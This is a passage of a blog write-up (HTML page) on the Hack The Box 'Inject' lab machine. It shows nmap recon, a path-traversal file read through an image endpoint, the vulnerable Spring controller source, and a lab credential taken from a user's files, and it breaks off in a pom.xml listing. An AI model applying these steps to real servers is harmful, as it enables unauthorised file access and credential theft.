

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/0.ico">
  <link rel="icon" href="/img/0.ico">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="sh0ve1">
  <meta name="keywords" content="">
  
    <meta name="description" content="搞靶机">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB-inject">
<meta property="og:url" content="https://sh0ve1.github.io/2023/04/22/HTB-inject/index.html">
<meta property="og:site_name" content="sh0ve1&#39;s blog">
<meta property="og:description" content="搞靶机">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://sh0ve1.github.io/img/14.jpg">
<meta property="article:published_time" content="2023-04-22T06:53:00.000Z">
<meta property="article:modified_time" content="2023-04-27T03:30:25.375Z">
<meta property="article:author" content="sh0ve1">
<meta property="article:tag" content="hackthebox">
<meta property="article:tag" content="ansible">
<meta property="article:tag" content="spring-boot">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://sh0ve1.github.io/img/14.jpg">
  
  
  <title>HTB-inject - sh0ve1&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"sh0ve1.github.io","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"pU0JQUaRtEv6Lgu0jxYpEBT9-gzGzoHsz","app_key":"2Gdcl19Uu0nQBNMs6fu6YiR4","server_url":"https://pu0jquar.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 6.1.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>sh0ve1&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/post_1.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="HTB-inject">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2023-04-22 14:53" pubdate>
        2023年4月22日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      8.7k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      73 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">HTB-inject</h1>
            
            <div class="markdown-body">
              <h2 id="Introduce"><a href="#Introduce" class="headerlink" title="Introduce"></a>Introduce</h2><p>Rate : EASY<br>OS : Linux</p>
<p>主要考察spring-boot相关漏洞，ansible playbook 基本知识。</p>
<h2 id="Recon"><a href="#Recon" class="headerlink" title="Recon"></a>Recon</h2><h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><ul>
<li><p>nmap –min-rate 10000 -p- -oN nmap&#x2F;port 10.10.11.204</p>
<figure class="highlight vhdl"><table><tr><td class="gutter"><div class="code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></div></td><td class="code"><pre><code class="hljs vhdl">Nmap scan <span class="hljs-keyword">report</span> <span class="hljs-keyword">for</span> <span class="hljs-number">10.10</span>.<span class="hljs-number">11.204</span><br>Host <span class="hljs-keyword">is</span> up (<span class="hljs-number">0.28</span>s latency).<br><span class="hljs-keyword">Not</span> shown: <span class="hljs-number">65533</span> closed tcp ports (reset)<br><span class="hljs-keyword">PORT</span>     STATE SERVICE<br><span class="hljs-number">22</span>/tcp   <span class="hljs-keyword">open</span>  ssh<br><span class="hljs-number">8080</span>/tcp <span class="hljs-keyword">open</span>  http-proxy<br></code></pre></td></tr></table></figure></li>
<li><p>nmap -sT -sV -O -p22,8080 -sC -oN nmap&#x2F;detail 10.10.11.204</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs llvm">Nmap scan report for <span class="hljs-number">10.10</span>.<span class="hljs-number">11.204</span><br>Host is up (<span class="hljs-number">0.27</span>s latency).<br><br>PORT     STATE SERVICE     VERSION<br><span class="hljs-number">22</span>/tcp   open  ssh         OpenSSH <span class="hljs-number">8.2</span>p<span class="hljs-number">1</span> Ubuntu <span class="hljs-number">4</span>ubuntu<span class="hljs-number">0.5</span> (Ubuntu Linux<span class="hljs-comment">; protocol 2.0)</span><br>\| ssh-hostkey:<br>\|   <span class="hljs-number">3072</span> caf<span class="hljs-number">10</span><span class="hljs-keyword">c</span><span class="hljs-number">515</span>a<span class="hljs-number">596277</span>f<span class="hljs-number">0</span>a<span class="hljs-number">80</span><span class="hljs-keyword">c</span><span class="hljs-number">5</span><span class="hljs-keyword">c</span><span class="hljs-number">7</span><span class="hljs-keyword">c</span><span class="hljs-number">8</span>ddaf<span class="hljs-number">8</span> (RSA)<br>\|   <span class="hljs-number">256</span> d<span class="hljs-number">51</span><span class="hljs-keyword">c</span><span class="hljs-number">81</span><span class="hljs-keyword">c</span><span class="hljs-number">97</span>b<span class="hljs-number">076</span>b<span class="hljs-number">1</span><span class="hljs-keyword">cc</span><span class="hljs-number">1</span>b<span class="hljs-number">429254</span>b<span class="hljs-number">52219</span>f (ECDSA)<br>|\_  <span class="hljs-number">256</span> db<span class="hljs-number">1</span>d<span class="hljs-number">8</span>ceb<span class="hljs-number">9472</span>b<span class="hljs-number">0</span>d<span class="hljs-number">3</span>ed<span class="hljs-number">44</span>b<span class="hljs-number">96</span><span class="hljs-keyword">c</span><span class="hljs-number">93</span>a<span class="hljs-number">7</span>f<span class="hljs-number">91</span>d (ED<span class="hljs-number">25519</span>)<br><span class="hljs-number">8080</span>/tcp open  nagios-nsca Nagios NSCA<br>|\_http-title: Home<br>Warning: OSScan results may be unreliable because we could not find at least <span class="hljs-number">1</span> open <span class="hljs-keyword">and</span> <span class="hljs-number">1</span> closed port<br>Aggressive OS guesses: Linux <span class="hljs-number">2.6</span>.<span class="hljs-number">32</span> (<span class="hljs-number">96</span>%)<span class="hljs-punctuation">,</span> Linux <span class="hljs-number">4.15</span> - <span class="hljs-number">5.6</span> (<span class="hljs-number">95</span>%)<span class="hljs-punctuation">,</span> Linux <span class="hljs-number">5.0</span> - <span class="hljs-number">5.3</span> (<span class="hljs-number">95</span>%)<span class="hljs-punctuation">,</span> Linux <span class="hljs-number">5.3</span> - <span class="hljs-number">5.4</span> (<span class="hljs-number">95</span>%)<span class="hljs-punctuation">,</span> Linux <span class="hljs-number">3.1</span> (<span class="hljs-number">94</span>%)<span class="hljs-punctuation">,</span> Linux <span class="hljs-number">3.2</span> (<span class="hljs-number">94</span>%)<span class="hljs-punctuation">,</span> AXIS <span class="hljs-number">210</span>A <span class="hljs-keyword">or</span> <span class="hljs-number">211</span> Network Camera (Linux <span class="hljs-number">2.6</span>.<span class="hljs-number">17</span>) (<span class="hljs-number">94</span>%)<span class="hljs-punctuation">,</span> Linux <span class="hljs-number">2.6</span>.<span class="hljs-number">38</span> (<span class="hljs-number">93</span>%)<span class="hljs-punctuation">,</span> ASUS RT-N<span class="hljs-number">56</span>U WAP (Linux <span class="hljs-number">3.4</span>) (<span class="hljs-number">93</span>%)<span class="hljs-punctuation">,</span> Linux <span class="hljs-number">3.16</span> (<span class="hljs-number">93</span>%)<br>No <span class="hljs-keyword">exact</span> OS matches for host (test conditions non-ideal).<br>Network Distance: <span class="hljs-number">2</span> hops<br>Service Info: OS: Linux<span class="hljs-comment">; CPE: cpe:/o\:linux\:linux\_kernel</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>nmap -sU -p22,8080 -oN nmap&#x2F;udp 10.10.11.204</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">Nmap</span> scan report for <span class="hljs-number">10.10.11.204</span><br><span class="hljs-attribute">Host</span> is up (<span class="hljs-number">0</span>.<span class="hljs-number">27</span>s latency).<br><br><span class="hljs-attribute">PORT</span>     STATE  SERVICE<br><span class="hljs-attribute">22</span>/udp   closed ssh<br><span class="hljs-attribute">8080</span>/udp closed http-alt<br></code></pre></td></tr></table></figure></li>
<li><p>nmap –script&#x3D;vuln -p22,8080 -oN nmap&#x2F;vuln 10.10.11.204</p>
</li>
</ul>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver">Starting Nmap <span class="hljs-number">7.93</span> ( <span class="hljs-keyword">https</span>://nmap.org ) <span class="hljs-keyword">at</span> <span class="hljs-number">2023</span><span class="hljs-number">-04</span><span class="hljs-number">-23</span> <span class="hljs-number">17</span>:<span class="hljs-number">42</span> CST<br>Nmap scan report <span class="hljs-keyword">for</span> <span class="hljs-number">10.10</span><span class="hljs-number">.11</span><span class="hljs-number">.204</span><br>Host is up (<span class="hljs-number">0.28</span>s latency).<br><br>PORT     STATE SERVICE<br><span class="hljs-number">22</span>/tcp   <span class="hljs-built_in">open</span>  ssh<br><span class="hljs-number">8080</span>/tcp <span class="hljs-built_in">open</span>  <span class="hljs-keyword">http</span>-proxy<br>| <span class="hljs-keyword">http</span>-enum: <br>|   /register/: Potentially interesting <span class="hljs-built_in">folder</span><br>|_  /upload/: Potentially interesting <span class="hljs-built_in">folder</span><br><br>Nmap done: <span class="hljs-number">1</span> IP address (<span class="hljs-number">1</span> host up) scanned <span class="hljs-keyword">in</span> <span class="hljs-number">1267.74</span> <span class="hljs-built_in">seconds</span><br></code></pre></td></tr></table></figure>

<h3 id="http"><a href="#http" class="headerlink" title="http"></a>http</h3><ul>
<li>访问8080端口，存在一个网站</li>
</ul>
<p><img src="https://note.youdao.com/yws/res/19761/86DE68E0491F4BBF896E5ADE575DAD00" srcset="/img/loading.gif" lazyload alt="image"></p>
<ul>
<li>blog 里面发现两个用户名 <code>admin</code> 和  <code>Brandon Auger</code> 。</li>
</ul>
<p><img src="https://note.youdao.com/yws/res/19765/D77BED2657FB46E99208F769A83E8166" srcset="/img/loading.gif" lazyload alt="image"></p>
<ul>
<li>访问upload，通过测试发现，文件上传功能只是检查了上传文件后缀，且采用了白名单，只允许 gif，jpeg和png文件。</li>
</ul>
<p><img src="https://note.youdao.com/yws/res/19771/6B2D4ED6E6C344379C9E8118CD98715B" srcset="/img/loading.gif" lazyload alt="image"></p>
<ul>
<li>上传文件后，发现点击 View your Image 即可访问上传图片。</li>
</ul>
<p><img src="https://note.youdao.com/yws/res/19779/E5659ED492F549EBA46F914BB715B267" srcset="/img/loading.gif" lazyload alt="image"></p>
<p><img src="https://note.youdao.com/yws/res/19789/0198D85FBE2D474893A519799D5B4D51" srcset="/img/loading.gif" lazyload alt="image"></p>
<h2 id="User-Privilege"><a href="#User-Privilege" class="headerlink" title="User Privilege"></a>User Privilege</h2><ul>
<li>抓包，尝试控制 img 参数，发现存在任意文件读取和目录遍历漏洞。</li>
</ul>
<p><img src="https://note.youdao.com/yws/res/19796/FBD86450DB784815A64A247EC28897DC" srcset="/img/loading.gif" lazyload alt="image"></p>
<ul>
<li>发现home目录下存在两个用户目录 phil 和 frank。</li>
</ul>
<p><img src="https://note.youdao.com/yws/res/19802/74223BAC8C0D438DB6F0826B7EBF05A8" srcset="/img/loading.gif" lazyload alt="image"></p>
<ul>
<li>发现不能读取 phil 目录下的 user.txt 文件 ，应该是权限问题</li>
</ul>
<p><img src="https://note.youdao.com/yws/res/19806/3813F0127C744FF6B7BA76BF950BDFB7" srcset="/img/loading.gif" lazyload alt="image"></p>
<ul>
<li>查看webapp关键源码 UserController.java</li>
</ul>
<figure class="highlight typescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><code class="hljs typescript"><span class="hljs-meta">@Controller</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">UserController</span> &#123;<br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-title class_">String</span> <span class="hljs-variable constant_">UPLOADED_FOLDER</span> = <span class="hljs-string">&quot;/var/www/WebApp/src/main/uploads/&quot;</span>;<br>    <span class="hljs-meta">@GetMapping</span>(<span class="hljs-string">&quot;&quot;</span>)<br>    <span class="hljs-keyword">public</span> <span class="hljs-title class_">String</span> <span class="hljs-title function_">homePage</span>(<span class="hljs-params"></span>)&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;homepage&quot;</span>;<br>    &#125;<br><br>    <span class="hljs-meta">@GetMapping</span>(<span class="hljs-string">&quot;/register&quot;</span>)<br>    <span class="hljs-keyword">public</span> <span class="hljs-title class_">String</span> <span class="hljs-title function_">signUpFormGET</span>(<span class="hljs-params"></span>)&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;under&quot;</span>;<br>    &#125;<br>    <span class="hljs-meta">@RequestMapping</span>(value = <span class="hljs-string">&quot;/upload&quot;</span>, method = <span class="hljs-title class_">RequestMethod</span>.<span class="hljs-property">GET</span>)<br>    <span class="hljs-keyword">public</span> <span class="hljs-title class_">String</span> <span class="hljs-title class_">UploadFormGet</span>()&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;upload&quot;</span>;<br>    &#125;<br><br>    <span class="hljs-meta">@RequestMapping</span>(value = <span class="hljs-string">&quot;/show_image&quot;</span>, method = <span class="hljs-title class_">RequestMethod</span>.<span class="hljs-property">GET</span>)<br>    <span class="hljs-keyword">public</span> <span class="hljs-title class_">ResponseEntity</span> <span class="hljs-title function_">getImage</span>(<span class="hljs-params"><span class="hljs-meta">@RequestParam</span>(<span class="hljs-string">&quot;img&quot;</span>) <span class="hljs-built_in">String</span> name</span>) &#123;<br>        <span class="hljs-title class_">String</span> fileName = <span class="hljs-variable constant_">UPLOADED_FOLDER</span> + name;<br>        <span class="hljs-title class_">Path</span> path = <span class="hljs-title class_">Paths</span>.<span class="hljs-title function_">get</span>(fileName);<br>        <span class="hljs-title class_">Resource</span> resource = <span class="hljs-literal">null</span>;<br>        <span class="hljs-keyword">try</span> &#123;<br>            resource = <span class="hljs-keyword">new</span> <span class="hljs-title class_">UrlResource</span>(path.<span class="hljs-title function_">toUri</span>());<br>        &#125; <span class="hljs-keyword">catch</span> (<span class="hljs-title class_">MalformedURLException</span> e)&#123;<br>            e.<span class="hljs-title function_">printStackTrace</span>();<br>        &#125;<br>        <span class="hljs-keyword">return</span> <span class="hljs-title class_">ResponseEntity</span>.<span class="hljs-title function_">ok</span>().<span class="hljs-title function_">contentType</span>(<span class="hljs-title class_">MediaType</span>.<span class="hljs-property">IMAGE_JPEG</span>).<span class="hljs-title function_">body</span>(resource);<br>    &#125;<br>    <br>    <span class="hljs-meta">@PostMapping</span>(<span class="hljs-string">&quot;/upload&quot;</span>)<br>    <span class="hljs-keyword">public</span> <span class="hljs-title class_">String</span> <span class="hljs-title class_">Upload</span>(<span class="hljs-meta">@RequestParam</span>(<span class="hljs-string">&quot;file&quot;</span>) <span class="hljs-title class_">MultipartFile</span> file, <span class="hljs-title class_">Model</span> model)&#123;<br>        <span class="hljs-title class_">String</span> fileName = <span class="hljs-title class_">StringUtils</span>.<span class="hljs-title function_">cleanPath</span>(file.<span class="hljs-title function_">getOriginalFilename</span>());<br>        <span class="hljs-keyword">if</span> (!file.<span class="hljs-title function_">isEmpty</span>() &amp;&amp; !fileName.<span class="hljs-title function_">contains</span>(<span class="hljs-string">&quot;/&quot;</span>))&#123;<br>            <span class="hljs-title class_">String</span> mimetype = <span class="hljs-keyword">new</span> <span class="hljs-title class_">MimetypesFileTypeMap</span>().<span class="hljs-title function_">getContentType</span>(fileName);<br>            <span class="hljs-title class_">String</span> <span class="hljs-keyword">type</span> = mimetype.<span class="hljs-title function_">split</span>(<span class="hljs-string">&quot;/&quot;</span>)[<span class="hljs-number">0</span>];<br>            <span class="hljs-keyword">if</span> (<span class="hljs-keyword">type</span>.<span class="hljs-title function_">equals</span>(<span class="hljs-string">&quot;image&quot;</span>))&#123;<br>                <span class="hljs-keyword">try</span> &#123;<br>                    <span class="hljs-title class_">Path</span> path = <span class="hljs-title class_">Paths</span>.<span class="hljs-title function_">get</span>(<span class="hljs-variable constant_">UPLOADED_FOLDER</span>+fileName);<br>                    <span class="hljs-title class_">Files</span>.<span class="hljs-title function_">copy</span>(file.<span class="hljs-title function_">getInputStream</span>(),path, <span class="hljs-title class_">StandardCopyOption</span>.<span class="hljs-property">REPLACE_EXISTING</span>);<br>                &#125; <span class="hljs-keyword">catch</span> (<span class="hljs-title class_">IOException</span> e)&#123;<br>                    e.<span class="hljs-title function_">printStackTrace</span>();<br>                &#125;<br>                model.<span class="hljs-title function_">addAttribute</span>(<span class="hljs-string">&quot;name&quot;</span>, fileName);<br>                model.<span class="hljs-title function_">addAttribute</span>(<span class="hljs-string">&quot;message&quot;</span>, <span class="hljs-string">&quot;Uploaded!&quot;</span>);<br>            &#125; <span class="hljs-keyword">else</span> &#123;<br>                model.<span class="hljs-title function_">addAttribute</span>(<span class="hljs-string">&quot;message&quot;</span>, <span class="hljs-string">&quot;Only image files are accepted!&quot;</span>);<br>            &#125;<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>            model.<span class="hljs-title function_">addAttribute</span>(<span class="hljs-string">&quot;message&quot;</span>, <span class="hljs-string">&quot;Please Upload a file!&quot;</span>);<br>        &#125;<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;upload&quot;</span>;<br>    &#125;<br>    <br>    <span class="hljs-meta">@GetMapping</span>(<span class="hljs-string">&quot;/release_notes&quot;</span>)<br>    <span class="hljs-keyword">public</span> <span class="hljs-title class_">String</span> <span class="hljs-title function_">changelog</span>(<span class="hljs-params"></span>)&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;change&quot;</span>;<br>    &#125;<br>    <br>    <span class="hljs-meta">@GetMapping</span>(<span class="hljs-string">&quot;/blogs&quot;</span>)<br>    <span class="hljs-keyword">public</span> <span class="hljs-title class_">String</span> <span class="hljs-title function_">blogPage</span>(<span class="hljs-params"></span>)&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;blog&quot;</span>;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<blockquote>
<p>MimetypesFileTypeMap 类是 Java 标准库中的一部分，它提供了一个方法 getContentType(String filename)，可以根据指定的文件名来获取对应的 MIME 类型。该方法的实现基于文件名的后缀名，它会查询内部维护的 MIME 类型映射表（通过读取 &#x2F;etc&#x2F;mime.types 文件），找到与文件后缀名对应的 MIME 类型，并返回给调用者。如果找不到对应的 MIME 类型，则返回 application&#x2F;octet-stream 类型，表示未知的二进制文件。</p>
</blockquote>
<ul>
<li>查看frank 用户目录下的文件，发现敏感信息： <code>phil:DocPhillovestoInject123</code></li>
</ul>
<p><img src="https://note.youdao.com/yws/res/19832/869DC924AB0D498C9C2860C03793DBD4" srcset="/img/loading.gif" lazyload alt="image"></p>
<ul>
<li>尝试使用该密码通过ssh登录phil,frank,root都失败了(事后发现，没有开启ssh)</li>
<li>查看 <code>pom.xml</code> webapp配置文件</li>
</ul>
<figure class="highlight dust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><code class="hljs dust"><span class="language-xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="language-xml"><span class="hljs-tag">&lt;<span class="hljs-name">project</span> <span class="hljs-attr">xmlns</span>=<span class="hljs-string">&quot;http://maven.apache.org/POM/4.0.0&quot;</span> <span class="hljs-attr">xmlns:xsi</span>=<span class="hljs-string">&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span></span></span><br><span class="hljs-tag"><span class="language-xml">	<span class="hljs-attr">xsi:schemaLocation</span>=<span class="hljs-string">&quot;http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd&quot;</span>&gt;</span></span><br><span class="language-xml">	<span class="hljs-tag">&lt;<span class="hljs-name">modelVersion</span>&gt;</span>4.0.0<span class="hljs-tag">&lt;/<span class="hljs-name">modelVersion</span>&gt;</span></span><br><span class="language-xml">	<span class="hljs-tag">&lt;<span class="hljs-name">parent</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>org.springframework.boot<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>spring-boot-starter-parent<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;<span class="hljs-name">version</span>&gt;</span>2.6.5<span class="hljs-tag">&lt;/<span class="hljs-name">version</span>&gt;</span></span><br><span class="language-xml">		<span class="hljs-tag">&lt;<span class="hljs-name">relativePath</span>/&gt;</span> <span class="hljs-comment">&lt;!-- lookup parent from repository --&gt;</span></span><br><span class="language-xml">	<span class="hljs-tag">&lt;/<span class="hljs-name">parent</span>&gt;</span></span><br><span class="language-xml">	<span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>com.example<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span></span><br><span class="language-xml">	<span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>WebApp<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span></span><br><span class="language-xml">	<span class="hljs-tag">&lt;<span class="hljs-name">version</span>&gt;</span>0.0.1-SNAPSHOT<span class="hljs-tag">&lt;/<span class="hljs-name">version</span>&gt;</span></span><br><span class="language-xml">	<span class="hljs-tag">&lt;<span class="hljs-name">name</span>&gt;</span>WebApp<span class="hljs-tag">&lt;/<span class="hljs-name">name</span>&gt;</span></span><br><span class="language-xml">	<span class="hljs-tag">&lt;<span class="hljs-name">description</span>&gt;</span>Demo project for Spring Boot<span class="hljs-tag">&lt;/<span class="hljs-name">description</span>&gt;</span></span><br><span 